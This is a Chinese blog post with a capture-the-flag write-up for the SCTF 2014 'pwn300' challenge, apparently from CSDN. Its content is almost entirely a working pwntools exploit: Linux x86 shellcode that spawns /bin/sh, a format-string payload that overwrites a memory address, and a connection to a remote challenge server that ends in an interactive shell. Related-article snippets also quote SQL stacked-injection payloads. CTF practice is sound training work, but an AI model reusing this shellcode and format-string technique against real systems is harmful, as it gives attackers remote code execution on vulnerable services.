sctf 2014 pwn300

最新推荐文章于 2021-07-29 11:05:37 发布
最新推荐文章于 2021-07-29 11:05:37 发布
阅读量572 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014281987/article/details/52614169
版权

关键:nx没开, cat /proc/[pid]/maps bss,data所属段可执行
 from pwn import *
shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f" \
                 "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0" \
                "\x0b\xcd\x80\n"
p=remote("218.2.197.235",10102)
print p.readuntil("input your choice:\n")
p.sendline('2')
print p.readuntil("input your message\n")
payload="\x20\x91\x04\x08"
payload+="%37248c%7$hn"
p.sendline(payload)
p.readuntil("input your choice:\n")
p.sendline("3")
p.readuntil("input your choice:\n")
p.sendline("2")
p.readuntil("input your message\n")
p.send(shellcode)

p.readuntil("input your choice:\n")
p.sendline("4")

p.interactive()


贴个pwntool formatstring的bug图片


lulu_ctf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
[强网杯 2019]随便注
沐目的博客
10-20 838
1知识点 1.1MySQL命令 原来堆叠注入竟然真的有用,真的就像这道题所说的,安全和开发缺一不可。很久没用过堆叠注入了。复习一下把。 查看所有数据库:0’;show databases;%23 查看当前数据库的表: 1’;show tables;%23 查看某个表的某个字段: 0’;show username from users;%23 把users表名改为user:rename table...
2018护网杯easy_tornado(BUUCTF提供复现)
Sea_Sand息禅
09-26 4827
进入页面: 然后依次看一下: 1)/flag.txt 网页内容: /flag.txt flag in /fllllllllllllag url: file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36 这个页面告诉我们,flag在/fllllllllllllag文件中 2)/welcome.txt 网页内容: ...
SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3689
这里是摘要吗
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1272
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
sctf pwn200
weixin_30363981的博客
04-04 230
  题目给出了pwn200和libc.so。使用IDA查看程序,发现逻辑很简单。   使用checksec查看pwn200的安全属性,如下图:      发现NX enabled,No PIE。   在第一次读(0x08048524位置)的时候,可以读取17个字节,观察栈结构:   发现可以将nbytes覆盖,可以覆盖为0xff。   在第二次读(0x08048596位置)的时候,...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
SCTF2020:SCTF2020
04-01
SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
SCTF 2015 pwn试题分析
weixin_30819163的博客
05-11 157
Re1 是一个简单的字符串加密。程序使用了多个线程,然后进行同步。等加密线程加密好了之后才会启动验证线程。这个题比较坑的是IDA F5出来的结果不对,不知道是不是混淆机制。 刚开始看的是F5后的伪代码,一脸懵逼。后来看了下汇编才明白是怎么回事。 解密直接打表就可以,也可以写逆算法。 pwn1 用checksec看了一下保护机制,有canary+nx保护。漏洞是一个简单的栈溢出,但是...
初识shellcode
海枫的专栏
02-01 5880
重点介绍shellcode的定义、作用、编写步骤以及分类。
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 343
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
SCTF 2014 pwn题目分析
weixin_30673611的博客
05-11 96
因为最近要去做ctf比赛的这一块所以就针对性的分析一下近些年的各大比赛的PWN题目。主防项目目前先搁置起来了,等比赛打完再去搞吧。 这次分析的是去年的SCTF的赛题,是我的学长们出的题,个人感觉还是很符合套路的:一道栈溢出、一道格式化字符串、一道堆溢出。 pwn200 一个栈溢出。 题目给出了libc。保护只有nx。 拿到题后的基本思路就是leak出got表中函数的地址,然后拿li...
HITCTF PWN300--dynelf
Vccxx的博客
04-08 990
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
【BUUCTF - PWN】pwn1_sctf_2016
古月浪子的博客
03-19 4194
checksec一下 找到漏洞函数,s的长度为0x3c,而我们只能输入32个字符,不足以栈溢出,但是发现replace函数会把输入的 I 替换成 you,这样的话输入20个 I 就能填满s 找到后门函数 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.lo...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2165
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
SCTF2014/pwn400 writeup
fuchuangbob的专栏
06-12 1068
SCTF2014/pwn400 writeup 很容易找到漏洞在delete函数,delete函数的外部输入直接是个指针else if ( ptr->next ) { q = ptr->next; p = ptr->pre; p->next = q; q->pre = p; } .. free(ptr)利用双链
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 704
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值